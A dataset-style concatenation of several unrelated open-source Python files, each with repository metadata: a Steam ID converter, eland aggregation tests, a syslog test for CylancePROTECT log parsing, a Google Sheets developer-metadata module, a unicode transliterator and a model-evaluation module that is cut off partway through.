https://steamcommunity.com/profiles/[U:1:12]
https://steamcommunity.com/profiles/76561197960265740
https://steamcommunity.com/id/johnc
https://steamcommunity.com/user/r
https://steamcommunity.com/app/570
Parameters
----------
url
The Steam community url.
session
The session to make the request with. If this parameter is omitted a new one is generated.
Returns
-------
The found 64-bit ID or ``None`` if ``https://steamcommunity.com`` is down or no matching account is found.
"""
if not (search := URL_REGEX.match(str(url))):
return None
async with (
aiohttp.ClientSession() if session is None else nullcontext(session) as session,
session.get(f"https://{search['clean_url']}") as r,
):
text = await r.text()
if search["type"] in USER_URL_PATHS:
data = JSON_LOADS(match["json"]) if (match := USER_ID64_FROM_URL_REGEX.search(text)) else None
else:
data = CLAN_ID64_FROM_URL_REGEX.search(text)
return ID64(int(data["steamid"])) if data else None
_ID64_TO_ID32: Final = cast(Callable[[int], ID32], 0xFFFFFFFF.__and__)
TypeT = TypeVar("TypeT", bound=Type, default=Type, covariant=True)
class ID(Generic[TypeT], metaclass=abc.ABCMeta):
"""Convert a Steam ID between its various representations.
.. container:: operations
.. describe:: x == y
Checks if two IDs are equal.
.. describe:: hash(x)
Returns the hash of the ID.
.. describe:: str(x)
Returns the string representation of :attr:`id64`.
.. describe:: int(x)
Returns the :attr:`id64` of the ID.
.. describe:: format(x, format_spec)
Formats the ID using the given format spec.
Prefixes of ``32``, ``64`` can be used to specify which of :attr:`id` or :attr:`id64` to use.
Anything after the prefix is passed to :func:`format`.
E.g.
.. code-block:: pycon
>>> format(steam_id, "64x") # formats the `id64` as a hex string
"11000010264339c"
>>> format(steam_id, "32b") # formats the `id` as binary
"10011001000011001110011100"
>>> f"{steam_id:32b}" # same as above
Parameters
----------
id
The ID to convert.
type
The type of the ID.
universe
The universe of the ID.
instance
The instance of the ID.
"""
# format of a 64-bit steam ID:
# 0b0000000100010000000000000000000100010001001001110100110011000010
# └───┰──┘└─┰┘└─────────┰────────┘└──────────────┰───────────────┘
# │ │ │ │
# universe └ type └ instance └ account id
# (8 bits) (4 bits) (20 bits) (32 bits)
# Universe Type InstanceFlag ID32
# Public Individual All 287788226
__slots__ = ("id64", "__weakref__")
__class_getitem__ = classmethod(
GenericAlias
) # want the different behaviour between typing._GenericAlias todo with attribute forwarding
def __init__(
self,
id: Intable,
*,
type: TypeT | None = None,
universe: Universe | None = None,
instance: Instance | None = None,
):
self.id64: Final = parse_id64(id, type=type, universe=universe, instance=instance)
"""The Steam ID's 64-bit ID."""
def __int__(self) -> ID64:
return self.id64
def __eq__(self, other: object) -> bool:
return isinstance(other, ID) and self.id64 == other.id64
def __str__(self) -> str:
return str(self.id64)
def __hash__(self) -> int:
return hash(self.id64)
def __repr__(self) -> str:
return f"{self.__class__.__name__}(id={self.id}, type={self.type!r}, universe={self.universe!r}, instance={self.instance!r})"
def __format__(self, format_spec: str, /) -> str:
match format_spec[:2]:
case "64" | "":
return format(self.id64, format_spec[2:])
case "32":
return format(self.id, format_spec[2:])
case _:
raise ValueError(f"Unknown format specifier {format_spec!r}")
@property
def universe(self) -> Universe:
"""The Steam universe of the ID."""
return Universe.try_value((self.id64 >> 56) & 0xFF)
@property
def type(self) -> TypeT:
"""The Steam type of the ID."""
return cast(TypeT, Type.try_value((self.id64 >> 52) & 0xF))
@property
def instance(self) -> Instance:
"""The instance of the ID."""
return Instance.try_value((self.id64 >> 32) & 0xFFFFF)
@property
def id(self, _ID64_TO_ID32: Callable[[ID64], ID32] = _ID64_TO_ID32, /) -> ID32:
"""The Steam ID's 32-bit ID."""
return _ID64_TO_ID32(self.id64)
@property
def id2(self) -> str:
"""The Steam ID's ID 2.
e.g ``STEAM_1:0:1234``.
"""
return f"STEAM_{self.universe.value}:{self.id % 2}:{self.id >> 1}"
@property
def id2_zero(self) -> str:
"""The Steam ID's ID 2 accounted for bugged GoldSrc and Orange Box games.
Note
----
In these games the accounts :attr:`universe`, ``1`` for :class:`.Type.Public`, should be the ``X`` component of
``STEAM_X:0:1234`` however, this was bugged and the value of ``X`` was ``0``.
e.g ``STEAM_0:0:1234``.
"""
return self.id2.replace("_1", "_0")
@property
def id3(self) -> str:
"""The Steam ID's ID 3.
e.g ``[U:1:1234]``.
"""
type_char = TypeChar(self.type).name
instance = None
match self.type:
case Type.AnonGameServer | Type.Multiseat:
instance = self.instance
case Type.Individual:
if self.instance != Instance.Desktop:
instance = self.instance
case Type.Chat:
if self.instance & Instance.ChatClan > 0:
type_char = "c"
elif self.instance & Instance.ChatLobby > 0:
type_char = "L"
else:
type_char = "T"
return f"[{type_char}:{self.universe.value}:{self.id}{f':{instance.value}' if instance is not None else ''}]"
# @property
# @overload
# def invite_code(self: ID[Type.Individual]) -> str:
# ...
#
# @property
# @overload
# def invite_code(self: ID[~Type.Individual]) -> None:
# ...
@property
def invite_code(self) -> str | None:
"""The Steam ID's invite code in the s.team invite code format.
e.g. ``cv-dgb``.
"""
if self.type == Type.Individual and self.is_valid():
invite_code = _invite_hex_sub(f"{self:32x}")
split_idx = len(invite_code) // 2
return invite_code if split_idx == 0 else f"{invite_code[:split_idx]}-{invite_code[split_idx:]}"
# @property
# @overload
# def invite_url(self: ID[Type.Individual]) -> str:
# ...
#
# @property
# @overload
# def invite_url(self: ID[~Type.Individual]) -> None:
# ...
#
@property
def invite_url(self) -> str | None:
"""The Steam ID's full invite code URL.
e.g ``https://s.team/p/cv-dgb``.
"""
code = self.invite_code
return f"https://s.team/p/{code}" if code else None
# @property
# @overload
# def community_url(self: ID[Type.Individual | Type.Clan]) -> str:
# ...
#
# @property
# @overload
# def community_url(self: ID[~(Type.Individual | Type.Clan)]) -> None:
# ...
@property
def community_url(self) -> str | None:
"""The Steam ID's community url if it is a :attr:`.Type.Individual` or :attr:`.Type.Clan`.
e.g ``https://steamcommunity.com/profiles/123456789`` or ``https://steamcommunity.com/gid/123456789``.
"""
match self.type:
case Type.Individual:
return str(URL.COMMUNITY / f"profiles/{self.id64}")
case Type.Clan:
return str(URL.COMMUNITY / f"gid/{self.id64}")
case _:
return None
def is_valid(self) -> bool:
"""Whether this Steam ID is valid.
A Steam ID is currently considered valid if:
- It is in ``(0, 2**64)``
- :attr:`universe` is in ``(Invalid, Dev]``
- :attr:`type` is in ``(Invalid, AnonUser]``
- If :attr:`type` is :attr:`.Type.Individual`:
- :attr:`id` is non-zero
- :attr:`instance` is in ``[All, Web]``
- If :attr:`type` is :attr:`.Type.Clan`:
- :attr:`id` is non-zero
- :attr:`instance` is ``All``.
- If :attr:`type` is :attr:`.Type.GameServer`:
- :attr:`id` is non-zero
"""
if not (0 < self.id64 < 2**64):
return False # this shouldn't ever happen unless someone messes around with id64 but w/e
if not (Universe.Invalid < self.universe <= Universe.Dev):
return False
if not (Type.Invalid < self.type <= Type.AnonUser):
return False
match self.type:
case Type.Individual:
return self.id != 0 and Instance.All <= self.instance <= Instance.Web
case Type.Clan:
return self.id != 0 and self.instance == Instance.All
case Type.GameServer:
return self.id != 0
return True
@staticmethod
def from_id2(value: str, /) -> IndividualID | None:
"""Create an ID from a user's :attr:`id2`.
Parameters
----------
value
The ID2 e.g. ``STEAM_1:0:1234``.
Note
----
The universe will be set to :attr:`Universe.Public` if it's ``0``. See :attr:`ID.id2_zero`.
"""
if (match := ID2_REGEX.fullmatch(value)) is None:
return None
id = (int(match["id"]) << 1) | int(match["remainder"])
universe = (
int(match["universe"])
or 1 # games before orange box used to incorrectly display universe as 0, we support that
)
return ID(id, type=Type.Individual, universe=Universe.try_value(universe), instance=Instance.Desktop)
@staticmethod
def from_id3(value: str, /) -> ID | None:
"""Create an ID from an SteamID's :attr:`id3`.
Parameters
----------
value
The ID3 e.g. ``[U:1:1234]``.
"""
if (match := ID3_REGEX.fullmatch(value)) is None:
return None
id = ID32(match["id"])
universe = Universe.try_value(int(match["universe"]))
type_char = TypeChar[match["type"].replace("i", "I")]
if instance_ := match["instance"]:
instance = Instance.try_value(int(instance_))
else:
instance = Instance.All
# we can't use simple match because that uses the int.__eq__ which won't work for L, c and T
match type_char.name:
case TypeChar.g.name | TypeChar.T.name:
instance = Instance.All
case TypeChar.L.name:
instance = Instance.ChatLobby
case TypeChar.c.name:
instance = Instance.ChatClan
case TypeChar.G.name | TypeChar.U.name:
instance = Instance.Desktop
return ID(id, type=type_char.value, universe=universe, instance=instance)
@staticmethod
def from_invite_code(value: str, /) -> ID[Literal[Type.Individual]] | None:
"""Create an ID from a user's :attr:`invite_code`.
Parameters
----------
value
The invite code e.g. ``cv-dgb``
"""
if (search := INVITE_REGEX.fullmatch(value)) is None:
return None
code = search["code"].replace("-", "")
id = ID32(_invite_custom_sub(code), 16)
if 0 < id < 2**32:
return ID(id, type=Type.Individual, universe=Universe.Public, instance=Instance.Desktop)
@staticmethod
async def from_url(
url: StrOrURL, /, session: ClientSession | None = None
) -> ID[Literal[Type.Individual, Type.Clan]] | None:
"""A helper function creates a Steam ID instance from a Steam community url.
Note
----
See :func:`id64_from_url` for the full parameter list.
"""
id64 = await id64_from_url(url, session)
if id64:
return ID[Literal[Type.Individual, Type.Clan]](id64)
ID_ZERO: Final = ID[Literal[Type.Individual]](0, type=Type.Individual)
|
98b77b3bcde651fe70dcc9a02e63dcb9a4145bd8
|
2b2b5e2a28038b8e2dea5bbec0f833cabfa0c256
|
/tests/dataframe/test_aggs_pytest.py
|
87ef84e90bbee3d80368cc347d603497e6f667bb
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause"
] |
permissive
|
elastic/eland
|
09b321d500c31abb04673a17bc9ea32f13d3358e
|
95864a9ace67337b863ebeb65ded808cf5ba03b3
|
refs/heads/main
| 2023-09-01T18:13:38.645147
| 2023-08-31T09:34:36
| 2023-08-31T09:34:36
| 191,316,757
| 524
| 95
|
Apache-2.0
| 2023-09-14T19:31:16
| 2019-06-11T07:24:06
|
Python
|
UTF-8
|
Python
| false
| false
| 5,029
|
py
|
test_aggs_pytest.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# File called _pytest for PyCharm compatability
import numpy as np
import pytest
from pandas.testing import assert_frame_equal, assert_series_equal
from tests.common import TestData
class TestDataFrameAggs(TestData):
def test_basic_aggs(self):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["sum", "min"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min"], numeric_only=True
)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_sum_min = pd_sum_min.astype("float64")
assert_frame_equal(pd_sum_min, ed_sum_min, check_exact=False)
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"]
)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"], numeric_only=True
)
print(pd_sum_min_std.dtypes)
print(ed_sum_min_std.dtypes)
assert_frame_equal(pd_sum_min_std, ed_sum_min_std, check_exact=False, rtol=True)
def test_terms_aggs(self):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["sum", "min"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min"], numeric_only=True
)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_sum_min = pd_sum_min.astype("float64")
assert_frame_equal(pd_sum_min, ed_sum_min, check_exact=False)
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"]
)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"], numeric_only=True
)
print(pd_sum_min_std.dtypes)
print(ed_sum_min_std.dtypes)
assert_frame_equal(pd_sum_min_std, ed_sum_min_std, check_exact=False, rtol=True)
def test_aggs_median_var(self):
pd_ecommerce = self.pd_ecommerce()
ed_ecommerce = self.ed_ecommerce()
pd_aggs = pd_ecommerce[
["taxful_total_price", "taxless_total_price", "total_quantity"]
].agg(["median", "var"])
ed_aggs = ed_ecommerce[
["taxful_total_price", "taxless_total_price", "total_quantity"]
].agg(["median", "var"], numeric_only=True)
print(pd_aggs, pd_aggs.dtypes)
print(ed_aggs, ed_aggs.dtypes)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_aggs = pd_aggs.astype("float64")
assert_frame_equal(pd_aggs, ed_aggs, check_exact=False, rtol=2)
# If Aggregate is given a string then series is returned.
@pytest.mark.parametrize("agg", ["mean", "min", "max"])
def test_terms_aggs_series(self, agg):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(agg)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
agg, numeric_only=True
)
assert_series_equal(pd_sum_min_std, ed_sum_min_std)
def test_terms_aggs_series_with_single_list_agg(self):
# aggs list with single agg should return dataframe.
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["mean"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["mean"], numeric_only=True
)
assert_frame_equal(pd_sum_min, ed_sum_min)
# If Wrong Aggregate value is given.
def test_terms_wrongaggs(self):
ed_flights = self.ed_flights()[["FlightDelayMin"]]
match = "('abc', ' not currently implemented')"
with pytest.raises(NotImplementedError, match=match):
ed_flights.select_dtypes(include=[np.number]).agg("abc")
|
4b8704930c531457bc677bdb82e8a90601c156d5
|
6bc58f290bc3ecd1f4d2a492f0abc5fd4b8ff9c0
|
/tests/test_cylance_protect.py
|
f300e72332b26fa65da11489515524da2d4fb850
|
[
"Apache-2.0",
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
splunk/splunk-connect-for-syslog
|
c5821e025ef1b5d1312a6ac71b822262f560aa99
|
472f0b7a0bcbb29cb00a141e4fe4aa6193c49fde
|
refs/heads/main
| 2023-08-25T03:57:40.245846
| 2023-08-21T08:55:12
| 2023-08-21T08:55:12
| 194,185,530
| 188
| 149
|
Apache-2.0
| 2023-09-14T18:31:04
| 2019-06-28T01:27:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
test_cylance_protect.py
|
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
env = Environment()
# <46>1 2021-12-08T21:07:19.100000Z sysloghost CylancePROTECT - - - Event Type: ExploitAttempt, Event Name: none, Device Name: DEVICENAME, IP Address: (), Action: None, Process ID: 72724, Process Name: C:\Program Files (x86)\Medcon\Medcon Common\Dicom2Avi_App.exe, User Name: tcsadmin, Violation Type: Stack Pivot, Zone Names: (Windows Server 2008), Device Id: a603a6e8-cac7-4d06-970c-24671e5af6cc, Policy Name: Servers Complete Policy
def test_cylance_exploit(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions for Checkpoint
epoch = epoch[:-3]
mt = env.from_string(
"{{ mark }} {{ iso }} {{ host }} CylancePROTECT - - - Event Type: ExploitAttempt, Event Name: none, Device Name: DEVICENAME"
)
message = mt.render(mark="<134>1", host=host, bsd=bsd, iso=iso)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
'search _time={{ epoch }} index=epintel host="{{ host }}" sourcetype="syslog_exploit"'
)
search = st.render(
epoch=epoch, bsd=bsd, host=host, date=date, time=time, tzoffset=tzoffset
)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
|
54341f0f4f234ac4c68cf1654f85ec1e5f952e85
|
38d76993b5b6337d0d8a8dcb4b1e4a84f8899d6d
|
/pygsheets/developer_metadata.py
|
aa71f4f04330381ba450075b83c0aa3f9b585a50
|
[
"MIT"
] |
permissive
|
nithinmurali/pygsheets
|
b094c113c68bbdf88438b2cb6088d2d9a8fca107
|
df688a3252263dacc057ff118b2c58968bf0246e
|
refs/heads/staging
| 2023-09-04T03:02:39.527120
| 2023-05-10T16:17:15
| 2023-05-10T16:17:15
| 60,546,709
| 1,530
| 259
|
NOASSERTION
| 2023-08-21T06:53:00
| 2016-06-06T17:20:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,853
|
py
|
developer_metadata.py
|
# -*- coding: utf-8 -*-.
class DeveloperMetadataLookupDataFilter:
"""Class for filtering developer metadata queries
This class only supports filtering for metadata on a whole spreadsheet or
worksheet.
:param spreadsheet_id: Spreadsheet id to filter on (leave at None to search all metadata)
:param sheet_id: Worksheet id to filter on (leave at None for whole-spreadsheet metadata)
:param meta_id: Developer metadata id to filter on (optional)
:param meta_key: Developer metadata key to filter on (optional)
:param meta_value: Developer metadata value to filter on (optional)
"""
def __init__(self, spreadsheet_id=None, sheet_id=None, meta_id=None, meta_key=None, meta_value=None):
self.spreadsheet_id = spreadsheet_id
self.sheet_id = sheet_id
self.meta_filters = {
"metadataId": meta_id,
"metadataKey": meta_key,
"metadataValue": meta_value,
"metadataLocation": self.location
}
def to_json(self):
lookup = dict((k, v) for k, v in self.meta_filters.items() if v is not None)
return {"developerMetadataLookup": lookup}
@property
def location(self):
if self.spreadsheet_id is not None:
if self.sheet_id is None:
return {"spreadsheet": True}
elif self.sheet_id is not None:
return {"sheetId": self.sheet_id}
return None
class DeveloperMetadata(object):
@classmethod
def new(cls, key, value, client, spreadsheet_id, sheet_id=None):
"""Create a new developer metadata entry
Will return None when in batch mode, otherwise will return a DeveloperMetadata object
:param key: They key of the new developer metadata entry to create
:param value: They value of the new developer metadata entry to create
:param client: The client which is responsible to connect the sheet with the remote.
:param spreadsheet_id: The id of the spreadsheet where metadata will be created.
:param sheet_id: The id of the worksheet where the metadata will be created (optional)
"""
filter = DeveloperMetadataLookupDataFilter(spreadsheet_id, sheet_id)
meta_id = client.sheet.developer_metadata_create(spreadsheet_id, key, value, filter.location)
if meta_id is None:
# we're in batch mode
return
return cls(meta_id, key, value, client, spreadsheet_id, sheet_id)
def __init__(self, meta_id, key, value, client, spreadsheet_id, sheet_id=None):
"""Create a new developer metadata entry
Will return None when in batch mode, otherwise will return a DeveloperMetadata object
:param meta_id: The id of the developer metadata entry this represents
:param key: They key of the new developer metadata entry this represents
:param value: They value of the new developer metadata entry this represents
:param client: The client which is responsible to connect the sheet with the remote.
:param spreadsheet_id: The id of the spreadsheet where metadata is stored
:param sheet_id: The id of the worksheet where the metadata is stored (optional)
"""
self._id = meta_id
self.key = key
self.value = value
self.client = client
self.spreadsheet_id = spreadsheet_id
self.sheet_id = sheet_id
self._filter = DeveloperMetadataLookupDataFilter(self.spreadsheet_id,
self.sheet_id, self.id)
def __repr__(self):
return "<DeveloperMetadata id={} key={} value={}>".format(repr(self.id),
repr(self.key),
repr(self.value))
@property
def id(self):
return self._id
def fetch(self):
"""Refresh this developer metadata entry from the spreadsheet"""
response = self.client.sheet.developer_metadata_get(self.spreadsheet_id, self.id)
self.key = response["metadataKey"]
self.value = response["metadataValue"]
def update(self):
"""Push the current local values to the spreadsheet"""
self.client.sheet.developer_metadata_update(self.spreadsheet_id, self.key,
self.value, self._filter.location,
self._filter.to_json())
def delete(self):
"""Delete this developer metadata entry"""
self.client.sheet.developer_metadata_delete(self.spreadsheet_id,
self._filter.to_json())
|
9e610f63625f3a5c22b39b8ddef12d5b82e2bd30
|
cad91ae76d2746a6c28ddda0f33a58f9d461378f
|
/PyTorch/SpeechSynthesis/Tacotron2/tacotron2/text/unidecoder/__init__.py
|
e2e76516561849f9e140a8610d9ada6e832cad64
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
NVIDIA/DeepLearningExamples
|
fe677521e7e2a16e3cb0b77e358f9aab72f8c11a
|
a5388a45f71a949639b35cc5b990bd130d2d8164
|
refs/heads/master
| 2023-08-31T20:57:08.798455
| 2023-08-23T10:09:12
| 2023-08-23T10:09:12
| 131,881,622
| 11,838
| 3,124
| null | 2023-08-28T16:57:33
| 2018-05-02T17:04:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,621
|
py
|
__init__.py
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import warnings
from .homoglyphs import homoglyphs
from .replacements import replacements
_replacements = {uni: asc for uni, asc in replacements}
_homoglyphs = {g: asc for asc, glyphs in homoglyphs.items() for g in glyphs}
def unidecoder(s, homoglyphs=False):
"""Transliterate unicode
Args:
s (str): unicode string
homoglyphs (bool): prioritize translating to homoglyphs
"""
warned = False # Once per utterance
ret = ''
for u in s:
if ord(u) < 127:
a = u
elif homoglyphs:
a = _homoglyphs.get(u, _replacements.get(u, None))
else:
a = _replacements.get(u, _homoglyphs.get(u, None))
if a is None:
if not warned:
warnings.warn(f'Unexpected character {u}: '
'please revise your text cleaning rules.',
stacklevel=10**6)
warned = True
else:
ret += a
return ret
|
b290fb490048d4dbc63779f03b394aa9f2f7bd0a
|
417e21443179541fcf48fde9407b3fd3f58d4406
|
/mindmeld/models/evaluation.py
|
3ebd71d761db3f0181b2febaf67c5c81f78bb1fa
|
[
"Apache-2.0"
] |
permissive
|
cisco/mindmeld
|
549e23eb6ee1385d2d1729ca532f1265d954276f
|
bd3547d5c1bd092dbd4a64a90528dfc2e2b3844a
|
refs/heads/master
| 2023-08-28T07:34:09.771290
| 2023-01-31T18:12:37
| 2023-01-31T18:12:37
| 177,415,822
| 671
| 194
|
Apache-2.0
| 2023-03-15T06:53:24
| 2019-03-24T13:05:00
|
Python
|
UTF-8
|
Python
| false
| false
| 22,141
|
py
|
evaluation.py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains base classes for models defined in the models subpackage."""
import logging
from collections import namedtuple
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score
from sklearn.metrics import precision_recall_fscore_support as score
from .helpers import (
ENTITIES_LABEL_TYPE,
entity_seqs_equal,
get_label_encoder,
)
from .taggers.taggers import (
BoundaryCounts,
get_boundary_counts,
)
logger = logging.getLogger(__name__)
class EvaluatedExample(
namedtuple(
"EvaluatedExample", ["example", "expected", "predicted", "probas", "label_type"]
)
):
"""Represents the evaluation of a single example
Attributes:
example: The example being evaluated
expected: The expected label for the example
predicted: The predicted label for the example
proba (dict): Maps labels to their predicted probabilities
label_type (str): One of CLASS_LABEL_TYPE or ENTITIES_LABEL_TYPE
"""
@property
def is_correct(self):
# For entities compare just the type, span and text for each entity.
if self.label_type == ENTITIES_LABEL_TYPE:
return entity_seqs_equal(self.expected, self.predicted)
# For other label_types compare the full objects
else:
return self.expected == self.predicted
class RawResults:
"""Represents the raw results of a set of evaluated examples. Useful for generating
stats and graphs.
Attributes:
predicted (list): A list of predictions. For sequences this is a list of lists, and for
standard classifieris this is a 1d array. All classes are in their numeric
representations for ease of use with evaluation libraries and graphing.
expected (list): Same as predicted but contains the true or gold values.
text_labels (list): A list of all the text label values, the index of the text label in
this array is the numeric label
predicted_flat (list): (Optional): For sequence models this is a flattened list of all
predicted tags (1d array)
expected_flat (list): (Optional): For sequence models this is a flattened list of all gold
tags
"""
def __init__(
self, predicted, expected, text_labels, predicted_flat=None, expected_flat=None
):
self.predicted = predicted
self.expected = expected
self.text_labels = text_labels
self.predicted_flat = predicted_flat
self.expected_flat = expected_flat
class ModelEvaluation(namedtuple("ModelEvaluation", ["config", "results"])):
"""Represents the evaluation of a model at a specific configuration
using a collection of examples and labels.
Attributes:
config (ModelConfig): The model config used during evaluation.
results (list of EvaluatedExample): A list of the evaluated examples.
"""
def __init__(self, config, results):
del results
self.label_encoder = get_label_encoder(config)
def get_accuracy(self):
"""The accuracy represents the share of examples whose predicted labels
exactly matched their expected labels.
Returns:
float: The accuracy of the model.
"""
num_examples = len(self.results)
num_correct = len([e for e in self.results if e.is_correct])
return float(num_correct) / float(num_examples)
def __repr__(self):
num_examples = len(self.results)
num_correct = len(list(self.correct_results()))
accuracy = self.get_accuracy()
msg = "<{} score: {:.2%}, {} of {} example{} correct>"
return msg.format(
self.__class__.__name__,
accuracy,
num_correct,
num_examples,
"" if num_examples == 1 else "s",
)
def correct_results(self):
"""
Returns:
iterable: Collection of the examples which were correct
"""
for result in self.results:
if result.is_correct:
yield result
def incorrect_results(self):
"""
Returns:
iterable: Collection of the examples which were incorrect
"""
for result in self.results:
if not result.is_correct:
yield result
def get_stats(self):
"""
Returns a structured stats object for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
raise NotImplementedError
def print_stats(self):
"""
Prints a useful stats table for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
raise NotImplementedError
def raw_results(self):
"""
Exposes raw vectors of expected and predicted for data scientists to use for any additional
evaluation metrics or to generate graphs of their choice.
Returns:
(tuple): tuple containing:
* NamedTuple: RawResults named tuple containing
* expected: vector of predicted classes (numeric value)
* predicted: vector of gold classes (numeric value)
* text_labels: a list of all the text label values, the index of the text label in
* this array is the numeric label
"""
raise NotImplementedError
@staticmethod
def _update_raw_result(label, text_labels, vec):
"""
Helper method for updating the text to numeric label vectors
Returns:
(tuple): tuple containing:
* text_labels: The updated text_labels array
* vec: The updated label vector with the given label appended
"""
if label not in text_labels:
text_labels.append(label)
vec.append(text_labels.index(label))
return text_labels, vec
def _get_common_stats(self, raw_expected, raw_predicted, text_labels):
"""
Prints a useful stats table and returns a structured stats object for evaluation.
Returns:
dict: Structured dict containing evaluation statistics. Contains precision, \
recall, f scores, support, etc.
"""
labels = range(len(text_labels))
confusion_stats = self._get_confusion_matrix_and_counts(
y_true=raw_expected, y_pred=raw_predicted
)
stats_overall = self._get_overall_stats(
y_true=raw_expected, y_pred=raw_predicted, labels=labels
)
counts_overall = confusion_stats["counts_overall"]
stats_overall["tp"] = counts_overall.tp
stats_overall["tn"] = counts_overall.tn
stats_overall["fp"] = counts_overall.fp
stats_overall["fn"] = counts_overall.fn
class_stats = self._get_class_stats(
y_true=raw_expected, y_pred=raw_predicted, labels=labels
)
counts_by_class = confusion_stats["counts_by_class"]
class_stats["tp"] = counts_by_class.tp
class_stats["tn"] = counts_by_class.tn
class_stats["fp"] = counts_by_class.fp
class_stats["fn"] = counts_by_class.fn
return {
"stats_overall": stats_overall,
"class_labels": text_labels,
"class_stats": class_stats,
"confusion_matrix": confusion_stats["confusion_matrix"],
}
@staticmethod
def _get_class_stats(y_true, y_pred, labels):
"""
Method for getting some basic statistics by class.
Returns:
dict: A structured dictionary containing precision, recall, f_beta, and support \
vectors (1 x number of classes)
"""
precision, recall, f_beta, support = score(
y_true=y_true, y_pred=y_pred, labels=labels
)
stats = {
"precision": precision,
"recall": recall,
"f_beta": f_beta,
"support": support,
}
return stats
@staticmethod
def _get_overall_stats(y_true, y_pred, labels):
"""
Method for getting some overall statistics.
Returns:
dict: A structured dictionary containing scalar values for f1 scores and overall \
accuracy.
"""
f1_weighted = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="weighted"
)
f1_macro = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="macro"
)
f1_micro = f1_score(
y_true=y_true, y_pred=y_pred, labels=labels, average="micro"
)
accuracy = accuracy_score(y_true=y_true, y_pred=y_pred)
stats_overall = {
"f1_weighted": f1_weighted,
"f1_macro": f1_macro,
"f1_micro": f1_micro,
"accuracy": accuracy,
}
return stats_overall
@staticmethod
def _get_confusion_matrix_and_counts(y_true, y_pred):
"""
Generates the confusion matrix where each element Cij is the number of observations known to
be in group i predicted to be in group j
Returns:
dict: Contains 2d array of the confusion matrix, and an array of tp, tn, fp, fn values
"""
confusion_mat = confusion_matrix(y_true=y_true, y_pred=y_pred)
tp_arr, tn_arr, fp_arr, fn_arr = [], [], [], []
num_classes = len(confusion_mat)
for class_index in range(num_classes):
# tp is C_classindex, classindex
tp = confusion_mat[class_index][class_index]
tp_arr.append(tp)
# tn is the sum of Cij where i or j are not class_index
mask = np.ones((num_classes, num_classes))
mask[:, class_index] = 0
mask[class_index, :] = 0
tn = np.sum(mask * confusion_mat)
tn_arr.append(tn)
# fp is the sum of Cij where j is class_index but i is not
mask = np.zeros((num_classes, num_classes))
